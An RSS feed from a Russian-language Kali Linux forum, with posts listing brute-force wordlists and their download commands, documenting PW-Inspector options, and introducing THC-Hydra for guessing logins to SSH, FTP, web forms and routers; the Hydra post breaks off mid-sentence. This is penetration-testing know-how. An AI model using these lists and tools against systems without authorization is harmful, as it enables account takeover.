<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>UseHelp - Справочно-Информационный Портал</title>
		<link>http://usehelp.clan.su/</link>
		<description>Форум</description>
		<lastBuildDate>Mon, 28 Mar 2016 14:08:09 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://usehelp.clan.su/forum/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>Списки слов для атаки по словарю</title>
			<link>https://usehelp.clan.su/forum/17-22-1</link>
			<pubDate>Mon, 28 Mar 2016 14:08:09 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: пароли, имена пользователей, каталоги&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Словари имён пользователей и паролей для брутфорсинга авторизации в сетевых службах&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Этими службами могут быть SSH, FTP, базовая авторизация, HTTP авторизация на сайте, почте и т. д.&lt;br /&gt;&lt;br /&gt;Для этого используются программы типа: &lt;b&gt;THC-Hydra, Medusa, Patator, BruteX&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;На данный момент, из этих программ со словарями поставляется только BruteX.&lt;br /&gt;&lt;br /&gt;Она использует словари с сайта &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/ej5lDg&quot; title=&quot;http://download.openwall.net/pub/wordlists/.&quot; rel=&quot;nofollow&quot;&gt;http://download.openwall.net/pub/wordlists/.&lt;/a&gt; Мы можем перейти на этот сайт, или одолжить словари прямо у самой этой программы для использования, например, с Patator.&lt;br /&gt;&lt;br /&gt;Скачать файл со списком имён:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/fT5lDg&quot; title=&quot;https://raw.githubusercontent.com/1N3/BruteX/master/namelist.txt&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/1N3/BruteX/master/namelist.txt&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Скачать файл со списком паролей:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/fD5lDg&quot; title=&quot;https://raw.githubusercontent.com/1N3/BruteX/master/password.lst&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/1N3/BruteX/master/password.lst&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;А этот файл содержит перечень распространённых пользователей Linux&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/ez5lDg&quot; title=&quot;https://raw.githubusercontent.com/1N3/BruteX/master/simple-users.txt&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/1N3/BruteX/master/simple-users.txt&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Этот список слов от nmap, не очень большой, подойдёт для перебора популярных паролей.&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/nmap/nselib/data/passwords.lst&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Ещё парочка словарей от Metasploit:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/wordlists/metasploit-jtr/common_roots.txt&lt;br /&gt;/usr/share/wordlists/metasploit-jtr/password.lst&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Словари для перебора субдоменов, каталогов, файлов и поиска админок.&lt;br /&gt;&lt;br /&gt;От BruteX:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/eT5lDg&quot; title=&quot;https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster.txt&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster.txt&lt;/a&gt; &lt;br /&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/eD5lDg&quot; title=&quot;https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster-ext.txt&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster-ext.txt&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;(второй словарь — это расширения файлов)&lt;br /&gt;&lt;br /&gt;Использование в названии файла dirb наводит нас на мыль о программе DIRB. С этой программой поставляется множество словарей.&lt;br /&gt;&lt;br /&gt;Они расположены в каталогах:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/dirb/wordlists&lt;br /&gt;/usr/share/dirbuster/wordlists&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Словари для взлома Wi-Fi&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Словарь rockyou является универсальным и довольно большим. Очень удобно его применять для атаки по словарю при взломе рукопожатия, перехваченного по Wi-Fi.&lt;br /&gt;&lt;br /&gt;Он уже имеется в Kali, размещён здесь:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/wordlists/rockyou.txt.gz&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Ещё один маленький файл&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/wordlists/fern-wifi&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Словари для перебора баз данных (таблиц, полей и т.д.) уже есть в Kali Linux&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/sqlmap/txt/wordlist.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Словари от Metasploit&lt;/span&gt;&lt;/b&gt; размещены тут:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;/usr/share/wordlists/metasploit&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Словари дефолтных учётных записей для роутеров:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;http&amp;#58;//usehelp.org/load_files/images/crunch_info/auth_basic.txt&lt;br /&gt;http&amp;#58;//usehelp.org/load_files/images/crunch_info/auth_digest.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-22-1</guid>
		</item>
		<item>
			<title>PW-Inspector - выбираем пароли соответствующие критериям</title>
			<link>https://usehelp.clan.su/forum/17-21-1</link>
			<pubDate>Mon, 28 Mar 2016 12:37:44 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: PW-Inspector читает пароли и выводит те из них, которые соот&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>Возвращаемый код - это количество найденных новых паролей, 0 - если пароли не найдены. &lt;br /&gt;Используйте аккуратно: проверяйте пароли, если возвращается 0, то отменяйте выбор паролей.&lt;br /&gt;&lt;br /&gt;Синтаксис:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;pw-inspector &amp;#91;-i ФАЙЛ] &amp;#91;-o ФАЙЛ] &amp;#91;-m МИН] &amp;#91;-M МАКС] &amp;#91;-c НАБОР] -l -u -n -p -s&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Опции:&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;Опции:&lt;br /&gt;&amp;nbsp;&amp;nbsp;-i ФАЙЛ&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;файл, из которого считываются пароли (по умолчанию: стандартный ввод&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-o ФАЙЛ&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;файл, в который будут записаны новые пароли (по умолчанию: стандартный вывод&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-m МИН&amp;nbsp;&amp;nbsp;минимальная длина новых паролей&lt;br /&gt;&amp;nbsp;&amp;nbsp;-M МАКС&amp;nbsp;&amp;nbsp;максимальная длина новых паролей&lt;br /&gt;&amp;nbsp;&amp;nbsp;-c НАБОР как минимум в пароле обязательно должны быть эти символы (по умолчанию: всё приемлемо&amp;#41;&lt;br /&gt;Sets:&lt;br /&gt;&amp;nbsp;&amp;nbsp;-l&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;строчные буквы (a,b,c,d и т.д.&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-u&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;заглавные буквы (A,B,C,D и т.д.&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-n&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;цифры (1,2,3,4 и т.д.&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-p&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;печатные символы (которые не -l/-n/-p, e.g. $,!,/,(,* и т.д.&amp;#41;&lt;br /&gt;&amp;nbsp;&amp;nbsp;-s&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;специальные символы — все остальные кроме уже перечисленных&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-21-1</guid>
		</item>
		<item>
			<title>Hydra. Брутфорсинг веб-сайтов - часть первая</title>
			<link>https://usehelp.clan.su/forum/17-20-1</link>
			<pubDate>Mon, 28 Mar 2016 12:24:58 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: THC-Hydra - очень быстрый взломщик сетевого входа в систему&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>Hydra - очень мощная и гибкая в настройках. Поддерживает огромное количество служб, благодаря своей быстроте и надёжности она завоевала заслуженную признательность среди тестеров на проникновение.&lt;br /&gt;&lt;br /&gt;Работает на Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) и OSX.&lt;br /&gt;&lt;br /&gt;Поддерживаются следующие протоколы: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Синтаксис Hydra:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra &amp;#91;&amp;#91;&amp;#91;-l LOGIN|-L FILE] &amp;#91;-p PASS|-P FILE]] | &amp;#91;-C FILE]] &amp;#91;-e nsr] &amp;#91;-o FILE] &amp;#91;-t TASKS] &amp;#91;-M FILE &amp;#91;-T TASKS]] &amp;#91;-w TIME] &amp;#91;-W TIME] &amp;#91;-f] &amp;#91;-s PORT] &amp;#91;-x MIN:MAX:CHARSET] &amp;#91;-SuvVd46] &amp;#91;service://server&amp;#91;:PORT]&amp;#91;/OPT]]&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Опции hydra:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;-R&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;восстановить предыдущую прерванную/оборванную сессию&lt;br /&gt;-S&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;выполнить SSL соединение&lt;br /&gt;-s ПОРТ&amp;nbsp;&amp;nbsp;&amp;nbsp;если служба не на порту по умолчанию, то можно задать порт здесь&lt;br /&gt;-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами&amp;#41;, или загрузить несколько логинов из ФАЙЛА&lt;br /&gt;-p ПАРОЛЬ&amp;nbsp;&amp;nbsp;или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА&lt;br /&gt;-x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ&amp;nbsp;&amp;nbsp;генерация паролей для брутфорса, наберите &quot;-x -h&quot; для помощи&lt;br /&gt;-e nsr&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&quot;n&quot; — пробовать с пустым паролем, &quot;s&quot; — логин в качестве пароля и/или &quot;r&quot; — реверс учётных данных&lt;br /&gt;-u&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;зацикливаться на пользователя, а не на паролях (эффективно! подразумевается с использованием опции -x&amp;#41;&lt;br /&gt;-C ФАЙЛ&amp;nbsp;&amp;nbsp;&amp;nbsp;формат где &quot;логин:пароль&quot; разделены двоеточиями, вместо опции -L/-P &lt;br /&gt;-M ФАЙЛ&amp;nbsp;&amp;nbsp;&amp;nbsp;список серверов для атак, одна запись на строку, после двоеточия &apos;:&apos; можно задать порт&lt;br /&gt;-o ФАЙЛ&amp;nbsp;&amp;nbsp;&amp;nbsp;записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода&lt;br /&gt;-f / -F&amp;nbsp;&amp;nbsp;&amp;nbsp;выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально&amp;#41;&lt;br /&gt;-t ЗАДАЧИ&amp;nbsp;&amp;nbsp;количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16&amp;#41;&lt;br /&gt;-w / -W ВРЕМЯ&amp;nbsp;&amp;nbsp;время ожидания ответов (32 секунды&amp;#41; / между соединениями на поток&lt;br /&gt;-4 / -6&amp;nbsp;&amp;nbsp;&amp;nbsp;предпочитать IPv4 (по умолчанию&amp;#41; или IPv6 адреса&lt;br /&gt;-v / -V / -d&amp;nbsp;&amp;nbsp;вербальный режим / показывать логин+пароль для каждой попытки / режим отладки &lt;br /&gt;-q&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;не печатать сообщения об ошибках соединения&lt;br /&gt;-U&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;подробные сведения об использовании модуля&lt;br /&gt;server&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M&amp;#41;&lt;br /&gt;service&amp;nbsp;&amp;nbsp;&amp;nbsp;служба для взлома (смотрите список поддерживаемых протоколов&amp;#41;&lt;br /&gt;OPT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю&amp;#41;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#274e13&quot;&gt;Как использовать hydra:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Пароли для Hydra&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Поставляется без логинов/паролей.&lt;br /&gt;Файлы с дефолтными паролями позволяет генерировать утилита от hydra — dpl4hydra.sh.&lt;br /&gt;&lt;br /&gt;Чтобы воспользоваться программой dpl4hydra.sh на Kali Linux, нам сначала нужно её скачать (в Kali Linux не включена в стандартную установку).&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;wget &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;http://u.to/hxZlDg&quot; title=&quot;https://raw.githubusercontent.com/vanhauser-thc/thc-hydra/master/dpl4hydra.sh&quot; rel=&quot;nofollow&quot;&gt;https://raw.githubusercontent.com/vanhaus....ydra.sh&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Теперь создаём необходимые для работы программы файлы:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;touch /usr/local/etc/dpl4hydra_full.csv /usr/local/etc/dpl4hydra_local.csv&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Запускаем первый раз&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;sh dpl4hydra.sh refresh&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Теперь можно сделать так:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;sh dpl4hydra.sh all&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;чтобы скачать дефолтные пароли для всех брендов. А можно задать конкретный бренд, например, меня 